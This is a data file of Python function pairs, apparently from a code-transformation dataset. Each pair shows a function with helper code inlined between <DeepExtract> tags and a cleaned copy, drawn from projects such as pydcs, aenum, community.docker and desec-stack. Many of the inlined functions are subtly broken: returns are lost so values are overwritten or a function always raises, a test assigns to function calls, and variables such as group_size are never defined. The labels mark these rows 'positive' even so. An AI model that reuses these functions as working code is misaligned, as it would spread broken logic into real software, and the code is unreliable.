<DeepExtract>
testing_filename = '%s/mnist_%s.tfrecord' % (dataset_dir, 'test')
</DeepExtract>
if tf.gfile.Exists(training_filename) and tf.gfile.Exists(testing_filename):
print('Dataset files already exist. Exiting without re-creating them.')
return
<DeepExtract>
for filename in [_TRAIN_DATA_FILENAME, _TRAIN_LABELS_FILENAME, _TEST_DATA_FILENAME, _TEST_LABELS_FILENAME]:
filepath = os.path.join(dataset_dir, filename)
if not os.path.exists(filepath):
print('Downloading file %s...' % filename)
def _progress(count, block_size, total_size):
sys.stdout.write('\r>> Downloading %.1f%%' % (float(count * block_size) / float(total_size) * 100.0))
sys.stdout.flush()
(filepath, _) = urllib.request.urlretrieve(_DATA_URL + filename, filepath, _progress)
print()
with tf.gfile.GFile(filepath) as f:
size = f.size()
print('Successfully downloaded', filename, size, 'bytes.')
</DeepExtract>
with tf.python_io.TFRecordWriter(training_filename) as tfrecord_writer:
data_filename = os.path.join(dataset_dir, _TRAIN_DATA_FILENAME)
labels_filename = os.path.join(dataset_dir, _TRAIN_LABELS_FILENAME)
<DeepExtract>
images = _extract_images(data_filename, 60000)
labels = _extract_labels(labels_filename, 60000)
shape = (_IMAGE_SIZE, _IMAGE_SIZE, _NUM_CHANNELS)
with tf.Graph().as_default():
image = tf.placeholder(dtype=tf.uint8, shape=shape)
encoded_png = tf.image.encode_png(image)
with tf.Session('') as sess:
for j in range(60000):
sys.stdout.write('\r>> Converting image %d/%d' % (j + 1, 60000))
sys.stdout.flush()
png_string = sess.run(encoded_png, feed_dict={image: images[j]})
example = dataset_utils.image_to_tfexample(png_string, 'png'.encode(), _IMAGE_SIZE, _IMAGE_SIZE, labels[j])
tfrecord_writer.write(example.SerializeToString())
</DeepExtract>
with tf.python_io.TFRecordWriter(testing_filename) as tfrecord_writer:
data_filename = os.path.join(dataset_dir, _TEST_DATA_FILENAME)
labels_filename = os.path.join(dataset_dir, _TEST_LABELS_FILENAME)
<DeepExtract>
images = _extract_images(data_filename, 10000)
labels = _extract_labels(labels_filename, 10000)
shape = (_IMAGE_SIZE, _IMAGE_SIZE, _NUM_CHANNELS)
with tf.Graph().as_default():
image = tf.placeholder(dtype=tf.uint8, shape=shape)
encoded_png = tf.image.encode_png(image)
with tf.Session('') as sess:
for j in range(10000):
sys.stdout.write('\r>> Converting image %d/%d' % (j + 1, 10000))
sys.stdout.flush()
png_string = sess.run(encoded_png, feed_dict={image: images[j]})
example = dataset_utils.image_to_tfexample(png_string, 'png'.encode(), _IMAGE_SIZE, _IMAGE_SIZE, labels[j])
tfrecord_writer.write(example.SerializeToString())
</DeepExtract>
labels_to_class_names = dict(zip(range(len(_CLASS_NAMES)), _CLASS_NAMES))
dataset_utils.write_label_file(labels_to_class_names, dataset_dir)
<DeepExtract>
for filename in [_TRAIN_DATA_FILENAME, _TRAIN_LABELS_FILENAME, _TEST_DATA_FILENAME, _TEST_LABELS_FILENAME]:
filepath = os.path.join(dataset_dir, filename)
tf.gfile.Remove(filepath)
</DeepExtract>
print('\nFinished converting the MNIST dataset!')
|
def run(dataset_dir):
"""Runs the download and conversion operation.
Args:
dataset_dir: The dataset directory where the dataset is stored.
"""
if not tf.gfile.Exists(dataset_dir):
tf.gfile.MakeDirs(dataset_dir)
training_filename = '%s/mnist_%s.tfrecord' % (dataset_dir, 'train')
testing_filename = '%s/mnist_%s.tfrecord' % (dataset_dir, 'test')
if tf.gfile.Exists(training_filename) and tf.gfile.Exists(testing_filename):
print('Dataset files already exist. Exiting without re-creating them.')
return
for filename in [_TRAIN_DATA_FILENAME, _TRAIN_LABELS_FILENAME, _TEST_DATA_FILENAME, _TEST_LABELS_FILENAME]:
filepath = os.path.join(dataset_dir, filename)
if not os.path.exists(filepath):
print('Downloading file %s...' % filename)
def _progress(count, block_size, total_size):
sys.stdout.write('\r>> Downloading %.1f%%' % (float(count * block_size) / float(total_size) * 100.0))
sys.stdout.flush()
(filepath, _) = urllib.request.urlretrieve(_DATA_URL + filename, filepath, _progress)
print()
with tf.gfile.GFile(filepath) as f:
size = f.size()
print('Successfully downloaded', filename, size, 'bytes.')
with tf.python_io.TFRecordWriter(training_filename) as tfrecord_writer:
data_filename = os.path.join(dataset_dir, _TRAIN_DATA_FILENAME)
labels_filename = os.path.join(dataset_dir, _TRAIN_LABELS_FILENAME)
images = _extract_images(data_filename, 60000)
labels = _extract_labels(labels_filename, 60000)
shape = (_IMAGE_SIZE, _IMAGE_SIZE, _NUM_CHANNELS)
with tf.Graph().as_default():
image = tf.placeholder(dtype=tf.uint8, shape=shape)
encoded_png = tf.image.encode_png(image)
with tf.Session('') as sess:
for j in range(60000):
sys.stdout.write('\r>> Converting image %d/%d' % (j + 1, 60000))
sys.stdout.flush()
png_string = sess.run(encoded_png, feed_dict={image: images[j]})
example = dataset_utils.image_to_tfexample(png_string, 'png'.encode(), _IMAGE_SIZE, _IMAGE_SIZE, labels[j])
tfrecord_writer.write(example.SerializeToString())
with tf.python_io.TFRecordWriter(testing_filename) as tfrecord_writer:
data_filename = os.path.join(dataset_dir, _TEST_DATA_FILENAME)
labels_filename = os.path.join(dataset_dir, _TEST_LABELS_FILENAME)
images = _extract_images(data_filename, 10000)
labels = _extract_labels(labels_filename, 10000)
shape = (_IMAGE_SIZE, _IMAGE_SIZE, _NUM_CHANNELS)
with tf.Graph().as_default():
image = tf.placeholder(dtype=tf.uint8, shape=shape)
encoded_png = tf.image.encode_png(image)
with tf.Session('') as sess:
for j in range(10000):
sys.stdout.write('\r>> Converting image %d/%d' % (j + 1, 10000))
sys.stdout.flush()
png_string = sess.run(encoded_png, feed_dict={image: images[j]})
example = dataset_utils.image_to_tfexample(png_string, 'png'.encode(), _IMAGE_SIZE, _IMAGE_SIZE, labels[j])
tfrecord_writer.write(example.SerializeToString())
labels_to_class_names = dict(zip(range(len(_CLASS_NAMES)), _CLASS_NAMES))
dataset_utils.write_label_file(labels_to_class_names, dataset_dir)
for filename in [_TRAIN_DATA_FILENAME, _TRAIN_LABELS_FILENAME, _TEST_DATA_FILENAME, _TEST_LABELS_FILENAME]:
filepath = os.path.join(dataset_dir, filename)
tf.gfile.Remove(filepath)
print('\nFinished converting the MNIST dataset!')
|
edafa
|
positive
|
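The conversion loops above encode each MNIST image as PNG and wrap it in a tf.train.Example via dataset_utils.image_to_tfexample. A hedged, self-contained sketch of what such a helper typically looks like; the feature key names follow the common TF-Slim convention and are assumptions here rather than taken from the row above.
import tensorflow as tf
def image_to_tfexample(encoded_image, image_format, height, width, label):
    def _bytes(value):
        return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
    def _int64(value):
        return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
    # One serialized record per image: the encoded bytes plus minimal metadata.
    return tf.train.Example(features=tf.train.Features(feature={
        'image/encoded': _bytes(encoded_image),
        'image/format': _bytes(image_format),
        'image/height': _int64(height),
        'image/width': _int64(width),
        'image/class/label': _int64(label)}))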
def awacs_flight(self, country: Country, name: str, plane_type: Type[planes.PlaneType], airport: Optional[terrain_.Airport], position: mapping.Point, race_distance=30 * 1000, heading=90, altitude=4500, speed=550, start_type: StartType=StartType.Cold, frequency=140) -> unitgroup.FlyingGroup:
"""Add an AWACS flight group.
This is a simple way to add an AWACS flight group to your mission.
It needs an initial orbit point, race distance and heading from this point.
If an airport is given, the AWACS flight will start from there; otherwise
it will be placed 2 km in front of the reference position.
Args:
country(Country): Country object the awacs group belongs to
name: of the AWACS flight
plane_type(PlaneType): AWACS plane type. e.g E_3A
airport(terrain_.Airport): starting airport, use None if you want it to spawn inflight
position(dcs.mapping.Point): reference point for the race-track
race_distance: distance for the race-track pattern
heading: direction from the reference position
altitude: of the AWACS race-track
speed: of the AWACS flight
start_type(StartType): of the flight if it starts from an airport
frequency: VHF-AM frequency in MHz
Returns:
FlyingGroup: the created AWACS flight group
"""
if airport:
<DeepExtract>
if task.AWACS is None:
task.AWACS = plane_type.task_default
if task.AWACS is None:
raise ValueError(f'No main task was given and {plane_type.name} does not have a default task')
ag: unitgroup.FlyingGroup
if plane_type.helicopter:
ag = self.helicopter_group(name)
else:
ag = self.plane_group(name)
ag.task = task.AWACS.name
group_size = min(group_size, plane_type.group_size_max)
for i in range(1, group_size + 1):
p = self.aircraft(name + ' Pilot #{nr}'.format(nr=i), plane_type, country)
ag.add_unit(p)
country.add_aircraft_group(self._flying_group_from_airport(country, ag, task.AWACS, airport, start_type, parking_slots))
awacs = ag
</DeepExtract>
wp = awacs.add_runway_waypoint(airport)
else:
p = position.point_from_heading((heading + 180) % 360, 2000)
<DeepExtract>
if task.AWACS is None:
task.AWACS = plane_type.task_default
if task.AWACS is None:
raise ValueError(f'No main task was given and {plane_type.name} does not have a default task')
ag: unitgroup.FlyingGroup
if plane_type.helicopter:
ag = self.helicopter_group(name)
speed = speed if speed else 200
else:
ag = self.plane_group(name)
speed = speed if speed else 600
ag.task = task.AWACS.name
group_size = min(group_size, plane_type.group_size_max)
for i in range(1, group_size + 1):
p = self.aircraft(name + ' Pilot #{nr}'.format(nr=i), plane_type, country)
p.position = copy.copy(p)
p.fuel = int(p.fuel * 0.9)
ag.add_unit(p)
country.add_aircraft_group(self._flying_group_inflight(country, ag, task.AWACS, altitude, speed))
awacs = ag
</DeepExtract>
p = position.point_from_heading(heading + 180, 1000)
wp = awacs.add_waypoint(p, altitude, speed)
wp.tasks.append(task.SetFrequencyCommand(frequency))
wp = awacs.add_waypoint(position, altitude, speed)
wp.tasks.append(task.OrbitAction(altitude, speed, task.OrbitAction.OrbitPattern.RaceTrack))
p = position.point_from_heading(heading, race_distance)
awacs.add_waypoint(p, altitude, speed)
return awacs
|
def awacs_flight(self, country: Country, name: str, plane_type: Type[planes.PlaneType], airport: Optional[terrain_.Airport], position: mapping.Point, race_distance=30 * 1000, heading=90, altitude=4500, speed=550, start_type: StartType=StartType.Cold, frequency=140) -> unitgroup.FlyingGroup:
"""Add an AWACS flight group.
This is a simple way to add an AWACS flight group to your mission.
It needs an initial orbit point, race distance and heading from this point.
If an airport is given, the AWACS flight will start from there; otherwise
it will be placed 2 km in front of the reference position.
Args:
country(Country): Country object the awacs group belongs to
name: of the AWACS flight
plane_type(PlaneType): AWACS plane type. e.g E_3A
airport(terrain_.Airport): starting airport, use None if you want it to spawn inflight
position(dcs.mapping.Point): reference point for the race-track
race_distance: distance for the race-track pattern
heading: direction from the reference position
altitude: of the AWACS race-track
speed: of the AWACS flight
start_type(StartType): of the flight if it starts from an airport
frequency: VHF-AM frequency in MHz
Returns:
FlyingGroup: the created AWACS flight group
"""
if airport:
if task.AWACS is None:
task.AWACS = plane_type.task_default
if task.AWACS is None:
raise ValueError(f'No main task was given and {plane_type.name} does not have a default task')
ag: unitgroup.FlyingGroup
if plane_type.helicopter:
ag = self.helicopter_group(name)
else:
ag = self.plane_group(name)
ag.task = task.AWACS.name
group_size = min(group_size, plane_type.group_size_max)
for i in range(1, group_size + 1):
p = self.aircraft(name + ' Pilot #{nr}'.format(nr=i), plane_type, country)
ag.add_unit(p)
country.add_aircraft_group(self._flying_group_from_airport(country, ag, task.AWACS, airport, start_type, parking_slots))
awacs = ag
wp = awacs.add_runway_waypoint(airport)
else:
p = position.point_from_heading((heading + 180) % 360, 2000)
if task.AWACS is None:
task.AWACS = plane_type.task_default
if task.AWACS is None:
raise ValueError(f'No main task was given and {plane_type.name} does not have a default task')
ag: unitgroup.FlyingGroup
if plane_type.helicopter:
ag = self.helicopter_group(name)
speed = speed if speed else 200
else:
ag = self.plane_group(name)
speed = speed if speed else 600
ag.task = task.AWACS.name
group_size = min(group_size, plane_type.group_size_max)
for i in range(1, group_size + 1):
p = self.aircraft(name + ' Pilot #{nr}'.format(nr=i), plane_type, country)
p.position = copy.copy(p)
p.fuel = int(p.fuel * 0.9)
ag.add_unit(p)
country.add_aircraft_group(self._flying_group_inflight(country, ag, task.AWACS, altitude, speed))
awacs = ag
p = position.point_from_heading(heading + 180, 1000)
wp = awacs.add_waypoint(p, altitude, speed)
wp.tasks.append(task.SetFrequencyCommand(frequency))
wp = awacs.add_waypoint(position, altitude, speed)
wp.tasks.append(task.OrbitAction(altitude, speed, task.OrbitAction.OrbitPattern.RaceTrack))
p = position.point_from_heading(heading, race_distance)
awacs.add_waypoint(p, altitude, speed)
return awacs
|
dcs
|
positive
|
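A hypothetical usage sketch of awacs_flight() as documented above; the mission setup, airport lookup, plane type and all numeric values are assumptions about a typical pydcs script, not taken from the row itself.
from dcs.mission import Mission
from dcs import planes
m = Mission()
usa = m.country('USA')                 # assumption: USA is present in the default blue coalition
batumi = m.terrain.airports['Batumi']  # assumption: airports are keyed by name on the default terrain
awacs = m.awacs_flight(
    usa, 'Overlord', planes.E_3A,
    airport=batumi,
    position=batumi.position.point_from_heading(0, 80 * 1000),  # orbit roughly 80 km north of the field
    race_distance=60 * 1000, heading=90,
    altitude=9000, speed=750, frequency=133)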
def get_index_candlestick_data(self, pair: 'str', interval: 'CandlestickInterval', startTime: 'long'=None, endTime: 'long'=None, limit: 'int'=None) -> any:
"""
Index Kline/Candlestick Data (MARKET_DATA)
GET /dapi/v1/indexPriceKlines
Index Kline/candlestick bars for a pair. Klines are uniquely identified by their open time.
"""
response = call_sync(self.request_impl.get_index_candlestick_data(pair, interval, startTime, endTime, limit))
<DeepExtract>
for (k, v) in response[1].items():
self.limits[k] = v
</DeepExtract>
return response[0]
|
def get_index_candlestick_data(self, pair: 'str', interval: 'CandlestickInterval', startTime: 'long'=None, endTime: 'long'=None, limit: 'int'=None) -> any:
"""
Index Kline/Candlestick Data (MARKET_DATA)
GET /dapi/v1/indexPriceKlines
Index Kline/candlestick bars for a pair. Klines are uniquely identified by their open time.
"""
response = call_sync(self.request_impl.get_index_candlestick_data(pair, interval, startTime, endTime, limit))
for (k, v) in response[1].items():
self.limits[k] = v
return response[0]
|
Binance_Futures_python
|
positive
|
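A hedged usage sketch for the index-price kline call above; the import paths, placeholder credentials and pair name are assumptions about the surrounding SDK, not confirmed by the row itself.
from binance_d import RequestClient                        # assumption: coin-margined futures client of the same SDK
from binance_d.model.constant import CandlestickInterval   # assumption: location of the interval constants
client = RequestClient(api_key='YOUR_API_KEY', secret_key='YOUR_SECRET_KEY')
# Market-data endpoint: the last 10 one-minute index-price klines for the BTCUSD pair.
klines = client.get_index_candlestick_data(pair='BTCUSD', interval=CandlestickInterval.MIN1, limit=10)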
def __call__(cls, *args, **kwds):
"""Creates a new NamedTuple class or an instance of a NamedTuple subclass.
NamedTuple should have args of (class_name, names, module)
`names` can be:
* A string containing member names, separated either with spaces or
commas. Values are auto-numbered from 0.
* An iterable of member names. Values are auto-numbered from 0.
* An iterable of (member name, value) pairs.
* A mapping of member name -> value.
`module`, if set, will be stored in the new class' __module__ attribute;
Note: if `module` is not set this routine will attempt to discover the
calling module by walking the frame stack; if this is unsuccessful
the resulting class will not be pickleable.
subclass should have whatever arguments and/or keywords will be used to create an
instance of the subclass
"""
if cls is NamedTuple:
original_args = args
original_kwds = kwds.copy()
try:
if 'class_name' in kwds:
class_name = kwds.pop('class_name')
else:
(class_name, args) = (args[0], args[1:])
if 'names' in kwds:
names = kwds.pop('names')
else:
(names, args) = (args[0], args[1:])
if 'module' in kwds:
module = kwds.pop('module')
elif args:
(module, args) = (args[0], args[1:])
else:
module = None
if 'type' in kwds:
type = kwds.pop('type')
elif args:
(type, args) = (args[0], args[1:])
else:
type = None
except IndexError:
raise TypeError('too few arguments to NamedTuple: %s, %s' % (original_args, original_kwds))
if args or kwds:
raise TypeError('too many arguments to NamedTuple: %s, %s' % (original_args, original_kwds))
if PY2:
if isinstance(class_name, unicode):
try:
class_name = class_name.encode('ascii')
except UnicodeEncodeError:
raise TypeError('%r is not representable in ASCII' % (class_name,))
if isinstance(names, NamedTupleMeta):
names.__name__ = class_name
if type is not None and type not in names.__bases__:
names.__bases__ = (type,) + names.__bases__
return names
metacls = cls.__class__
bases = (cls,)
clsdict = metacls.__prepare__(class_name, bases)
if isinstance(names, basestring):
names = names.replace(',', ' ').split()
if isinstance(names, (tuple, list)) and isinstance(names[0], basestring):
names = [(e, i) for (i, e) in enumerate(names)]
item = None
for item in names:
if isinstance(item, basestring):
(field_name, field_index) = (item, names[item])
elif len(item) == 2:
(field_name, field_index) = item
else:
(field_name, field_index) = (item[0], item[1:])
clsdict[field_name] = field_index
if type is not None:
if not isinstance(type, tuple):
type = (type,)
bases = type + bases
namedtuple_class = metacls.__new__(metacls, class_name, bases, clsdict)
if module is None:
try:
module = _sys._getframe(1).f_globals['__name__']
except (AttributeError, ValueError, KeyError):
pass
if module is None:
<DeepExtract>
def _break_on_call_reduce(self, proto):
raise TypeError('%r cannot be pickled' % self)
if isinstance(namedtuple_class, dict):
namedtuple_class['__reduce_ex__'] = _break_on_call_reduce
namedtuple_class['__module__'] = '<unknown>'
else:
setattr(namedtuple_class, '__reduce_ex__', _break_on_call_reduce)
setattr(namedtuple_class, '__module__', '<unknown>')
</DeepExtract>
else:
namedtuple_class.__module__ = module
return namedtuple_class
else:
namedtuple_instance = cls.__new__(cls, *args, **kwds)
if isinstance(namedtuple_instance, cls):
namedtuple_instance.__init__(*args, **kwds)
return namedtuple_instance
|
def __call__(cls, *args, **kwds):
"""Creates a new NamedTuple class or an instance of a NamedTuple subclass.
NamedTuple should have args of (class_name, names, module)
`names` can be:
* A string containing member names, separated either with spaces or
commas. Values are auto-numbered from 0.
* An iterable of member names. Values are auto-numbered from 0.
* An iterable of (member name, value) pairs.
* A mapping of member name -> value.
`module`, if set, will be stored in the new class' __module__ attribute;
Note: if `module` is not set this routine will attempt to discover the
calling module by walking the frame stack; if this is unsuccessful
the resulting class will not be pickleable.
subclass should have whatever arguments and/or keywords will be used to create an
instance of the subclass
"""
if cls is NamedTuple:
original_args = args
original_kwds = kwds.copy()
try:
if 'class_name' in kwds:
class_name = kwds.pop('class_name')
else:
(class_name, args) = (args[0], args[1:])
if 'names' in kwds:
names = kwds.pop('names')
else:
(names, args) = (args[0], args[1:])
if 'module' in kwds:
module = kwds.pop('module')
elif args:
(module, args) = (args[0], args[1:])
else:
module = None
if 'type' in kwds:
type = kwds.pop('type')
elif args:
(type, args) = (args[0], args[1:])
else:
type = None
except IndexError:
raise TypeError('too few arguments to NamedTuple: %s, %s' % (original_args, original_kwds))
if args or kwds:
raise TypeError('too many arguments to NamedTuple: %s, %s' % (original_args, original_kwds))
if PY2:
if isinstance(class_name, unicode):
try:
class_name = class_name.encode('ascii')
except UnicodeEncodeError:
raise TypeError('%r is not representable in ASCII' % (class_name,))
if isinstance(names, NamedTupleMeta):
names.__name__ = class_name
if type is not None and type not in names.__bases__:
names.__bases__ = (type,) + names.__bases__
return names
metacls = cls.__class__
bases = (cls,)
clsdict = metacls.__prepare__(class_name, bases)
if isinstance(names, basestring):
names = names.replace(',', ' ').split()
if isinstance(names, (tuple, list)) and isinstance(names[0], basestring):
names = [(e, i) for (i, e) in enumerate(names)]
item = None
for item in names:
if isinstance(item, basestring):
(field_name, field_index) = (item, names[item])
elif len(item) == 2:
(field_name, field_index) = item
else:
(field_name, field_index) = (item[0], item[1:])
clsdict[field_name] = field_index
if type is not None:
if not isinstance(type, tuple):
type = (type,)
bases = type + bases
namedtuple_class = metacls.__new__(metacls, class_name, bases, clsdict)
if module is None:
try:
module = _sys._getframe(1).f_globals['__name__']
except (AttributeError, ValueError, KeyError):
pass
if module is None:
def _break_on_call_reduce(self, proto):
raise TypeError('%r cannot be pickled' % self)
if isinstance(namedtuple_class, dict):
namedtuple_class['__reduce_ex__'] = _break_on_call_reduce
namedtuple_class['__module__'] = '<unknown>'
else:
setattr(namedtuple_class, '__reduce_ex__', _break_on_call_reduce)
setattr(namedtuple_class, '__module__', '<unknown>')
else:
namedtuple_class.__module__ = module
return namedtuple_class
else:
namedtuple_instance = cls.__new__(cls, *args, **kwds)
if isinstance(namedtuple_instance, cls):
namedtuple_instance.__init__(*args, **kwds)
return namedtuple_instance
|
aenum
|
positive
|
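A hedged usage sketch of the functional NamedTuple API whose creation path is shown above, assuming aenum is installed and following the docstring's description of `names`.
from aenum import NamedTuple
# Member names given as a single space- or comma-separated string.
Point = NamedTuple('Point', 'x y')
p = Point(3, 7)
print(p.x, p.y)    # -> 3 7
# Member names given as explicit (name, index) pairs, as the docstring also allows.
Pixel = NamedTuple('Pixel', [('r', 0), ('g', 1), ('b', 2)])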
def read_exactly(socket, n):
"""
Reads exactly n bytes from socket
Raises SocketError if there isn't enough data
"""
data = binary_type()
while len(data) < n:
<DeepExtract>
recoverable_errors = (errno.EINTR, errno.EDEADLK, errno.EWOULDBLOCK)
if PY3 and (not isinstance(socket, NpipeSocket)):
select.select([socket], [], [])
try:
if hasattr(socket, 'recv'):
next_data = socket.recv(n - len(data))
if PY3 and isinstance(socket, getattr(pysocket, 'SocketIO')):
next_data = socket.read(n - len(data))
next_data = os.read(socket.fileno(), n - len(data))
except EnvironmentError as e:
if e.errno not in recoverable_errors:
raise
except Exception as e:
is_pipe_ended = isinstance(socket, NpipeSocket) and len(e.args) > 0 and (e.args[0] == NPIPE_ENDED)
if is_pipe_ended:
next_data = 0
raise
</DeepExtract>
if not next_data:
raise SocketError('Unexpected EOF')
data += next_data
return data
|
def read_exactly(socket, n):
"""
Reads exactly n bytes from socket
Raises SocketError if there isn't enough data
"""
data = binary_type()
while len(data) < n:
recoverable_errors = (errno.EINTR, errno.EDEADLK, errno.EWOULDBLOCK)
if PY3 and (not isinstance(socket, NpipeSocket)):
select.select([socket], [], [])
try:
if hasattr(socket, 'recv'):
next_data = socket.recv(n - len(data))
if PY3 and isinstance(socket, getattr(pysocket, 'SocketIO')):
next_data = socket.read(n - len(data))
next_data = os.read(socket.fileno(), n - len(data))
except EnvironmentError as e:
if e.errno not in recoverable_errors:
raise
except Exception as e:
is_pipe_ended = isinstance(socket, NpipeSocket) and len(e.args) > 0 and (e.args[0] == NPIPE_ENDED)
if is_pipe_ended:
next_data = 0
raise
if not next_data:
raise SocketError('Unexpected EOF')
data += next_data
return data
|
community.docker
|
positive
|
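Stripped of the npipe and SocketIO special cases handled above, read_exactly is a read-until-n-bytes loop. A minimal hedged sketch of that core loop for an ordinary blocking socket (names chosen here, not part of the module's API):
def read_exactly_plain(sock, n):
    data = b''
    while len(data) < n:
        chunk = sock.recv(n - len(data))
        if not chunk:
            # The peer closed the connection before n bytes arrived.
            raise EOFError('Unexpected EOF after {} of {} bytes'.format(len(data), n))
        data += chunk
    return data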
def testCPULimitCFSBased(self):
"""
d1, d2 with CPU share limits
"""
<DeepExtract>
self.net = Containernet(controller=Controller)
self.net.addController('c0')
for i in range(0, 1):
self.s.append(self.net.addSwitch('s%d' % i))
if autolinkswitches:
for i in range(0, len(self.s) - 1):
self.net.addLink(self.s[i], self.s[i + 1])
for i in range(0, 0):
self.h.append(self.net.addHost('h%d' % i))
for i in range(0, 0):
self.d.append(self.net.addDocker('d%d' % i, dimage='ubuntu:trusty'))
</DeepExtract>
d0 = self.net.addDocker('d0', ip='10.0.0.1', dimage='ubuntu:trusty', cpu_period=50000, cpu_quota=10000)
d1 = self.net.addDocker('d1', ip='10.0.0.2', dimage='ubuntu:trusty', cpu_period=50000, cpu_quota=10000)
self.net.addLink(d0, self.s[0])
self.net.addLink(d1, self.s[0])
<DeepExtract>
self.net.start()
</DeepExtract>
self.assertTrue(len(self.net.hosts) == 2)
self.assertTrue(self.net.ping([d0, d1]) <= 0.0)
<DeepExtract>
self.net.stop()
self.s = []
self.h = []
self.d = []
</DeepExtract>
|
def testCPULimitCFSBased(self):
"""
d1, d2 with CPU share limits
"""
self.net = Containernet(controller=Controller)
self.net.addController('c0')
for i in range(0, 1):
self.s.append(self.net.addSwitch('s%d' % i))
if autolinkswitches:
for i in range(0, len(self.s) - 1):
self.net.addLink(self.s[i], self.s[i + 1])
for i in range(0, 0):
self.h.append(self.net.addHost('h%d' % i))
for i in range(0, 0):
self.d.append(self.net.addDocker('d%d' % i, dimage='ubuntu:trusty'))
d0 = self.net.addDocker('d0', ip='10.0.0.1', dimage='ubuntu:trusty', cpu_period=50000, cpu_quota=10000)
d1 = self.net.addDocker('d1', ip='10.0.0.2', dimage='ubuntu:trusty', cpu_period=50000, cpu_quota=10000)
self.net.addLink(d0, self.s[0])
self.net.addLink(d1, self.s[0])
self.net.start()
self.assertTrue(len(self.net.hosts) == 2)
self.assertTrue(self.net.ping([d0, d1]) <= 0.0)
self.net.stop()
self.s = []
self.h = []
self.d = []
|
containernet
|
positive
|
def get_input_location(location):
"""
Similar to :meth:`get_input_peer`, but for input messages.
Note that this returns a tuple ``(dc_id, location)``, the
``dc_id`` being present if known.
"""
<DeepExtract>
try:
if location.SUBCLASS_OF_ID == 354669666:
info = _FileInfo(None, location, None)
except AttributeError:
_raise_cast_fail(location, 'InputFileLocation')
if isinstance(location, types.Message):
location = location.media
if isinstance(location, types.MessageMediaDocument):
location = location.document
elif isinstance(location, types.MessageMediaPhoto):
location = location.photo
if isinstance(location, types.Document):
info = _FileInfo(location.dc_id, types.InputDocumentFileLocation(id=location.id, access_hash=location.access_hash, file_reference=location.file_reference, thumb_size=''), location.size)
elif isinstance(location, types.Photo):
info = _FileInfo(location.dc_id, types.InputPhotoFileLocation(id=location.id, access_hash=location.access_hash, file_reference=location.file_reference, thumb_size=location.sizes[-1].type), _photo_size_byte_count(location.sizes[-1]))
if isinstance(location, types.FileLocationToBeDeprecated):
raise TypeError('Unavailable location cannot be used as input')
_raise_cast_fail(location, 'InputFileLocation')
</DeepExtract>
return (info.dc_id, info.location)
|
def get_input_location(location):
"""
Similar to :meth:`get_input_peer`, but for input messages.
Note that this returns a tuple ``(dc_id, location)``, the
``dc_id`` being present if known.
"""
try:
if location.SUBCLASS_OF_ID == 354669666:
info = _FileInfo(None, location, None)
except AttributeError:
_raise_cast_fail(location, 'InputFileLocation')
if isinstance(location, types.Message):
location = location.media
if isinstance(location, types.MessageMediaDocument):
location = location.document
elif isinstance(location, types.MessageMediaPhoto):
location = location.photo
if isinstance(location, types.Document):
info = _FileInfo(location.dc_id, types.InputDocumentFileLocation(id=location.id, access_hash=location.access_hash, file_reference=location.file_reference, thumb_size=''), location.size)
elif isinstance(location, types.Photo):
info = _FileInfo(location.dc_id, types.InputPhotoFileLocation(id=location.id, access_hash=location.access_hash, file_reference=location.file_reference, thumb_size=location.sizes[-1].type), _photo_size_byte_count(location.sizes[-1]))
if isinstance(location, types.FileLocationToBeDeprecated):
raise TypeError('Unavailable location cannot be used as input')
_raise_cast_fail(location, 'InputFileLocation')
return (info.dc_id, info.location)
|
Awesome-Scripts
|
positive
|
def test_registration_known_account(self):
<DeepExtract>
(self.random_username(), self.random_password(), response) = self.register_user(self.random_username(), self.random_password(), late_captcha, **kwargs)
self.assertRegistrationSuccessResponse(response)
self.assertUserExists(self.random_username())
self.assertFalse(User.objects.get(email=self.random_username()).is_active)
self.assertIsNone(User.objects.get(email=self.random_username()).is_active)
self.assertEqual(User.objects.get(email=self.random_username()).needs_captcha, late_captcha)
self.assertEqual(User.objects.get(email=self.random_username()).outreach_preference, kwargs.get('outreach_preference', True))
self.assertPassword(self.random_username(), self.random_password())
confirmation_link = self.assertRegistrationEmail(self.random_username())
self.assertConfirmationLinkRedirect(confirmation_link)
response = self.client.verify(confirmation_link)
if late_captcha:
self.assertRegistrationVerificationFailureResponse(response)
(captcha_id, captcha_solution) = self.get_captcha()
data = {'captcha': {'id': captcha_id, 'solution': captcha_solution}}
response = self.client.verify(confirmation_link, data=data)
self.assertRegistrationVerificationSuccessResponse(response)
self.assertTrue(User.objects.get(email=self.random_username()).is_active)
self.assertFalse(User.objects.get(email=self.random_username()).needs_captcha)
self.assertPassword(self.random_username(), self.random_password())
(self.random_username(), _) = (self.random_username(), self.random_password())
</DeepExtract>
<DeepExtract>
return self.assertContains(response=self.register_user(email, self.random_password())[2], text='Welcome! Please check your mailbox.', status_code=status.HTTP_202_ACCEPTED)
</DeepExtract>
self.assertNoEmailSent()
|
def test_registration_known_account(self):
(self.random_username(), self.random_password(), response) = self.register_user(self.random_username(), self.random_password(), late_captcha, **kwargs)
self.assertRegistrationSuccessResponse(response)
self.assertUserExists(self.random_username())
self.assertFalse(User.objects.get(email=self.random_username()).is_active)
self.assertIsNone(User.objects.get(email=self.random_username()).is_active)
self.assertEqual(User.objects.get(email=self.random_username()).needs_captcha, late_captcha)
self.assertEqual(User.objects.get(email=self.random_username()).outreach_preference, kwargs.get('outreach_preference', True))
self.assertPassword(self.random_username(), self.random_password())
confirmation_link = self.assertRegistrationEmail(self.random_username())
self.assertConfirmationLinkRedirect(confirmation_link)
response = self.client.verify(confirmation_link)
if late_captcha:
self.assertRegistrationVerificationFailureResponse(response)
(captcha_id, captcha_solution) = self.get_captcha()
data = {'captcha': {'id': captcha_id, 'solution': captcha_solution}}
response = self.client.verify(confirmation_link, data=data)
self.assertRegistrationVerificationSuccessResponse(response)
self.assertTrue(User.objects.get(email=self.random_username()).is_active)
self.assertFalse(User.objects.get(email=self.random_username()).needs_captcha)
self.assertPassword(self.random_username(), self.random_password())
(self.random_username(), _) = (self.random_username(), self.random_password())
return self.assertContains(response=self.register_user(email, self.random_password())[2], text='Welcome! Please check your mailbox.', status_code=status.HTTP_202_ACCEPTED)
self.assertNoEmailSent()
|
desec-stack
|
positive
|
def send(self, outputs, fee=None, absolute_fee=False, leftover=None, combine=True, message=None, unspents=None, message_is_hex=False, replace_by_fee=False):
"""Creates a signed P2PKH transaction and attempts to broadcast it on
the testnet blockchain. This accepts the same arguments as
:func:`~bit.PrivateKeyTestnet.create_transaction`.
:param outputs: A sequence of outputs you wish to send in the form
``(destination, amount, currency)``. The amount can
be either an int, float, or string as long as it is
a valid input to ``decimal.Decimal``. The currency
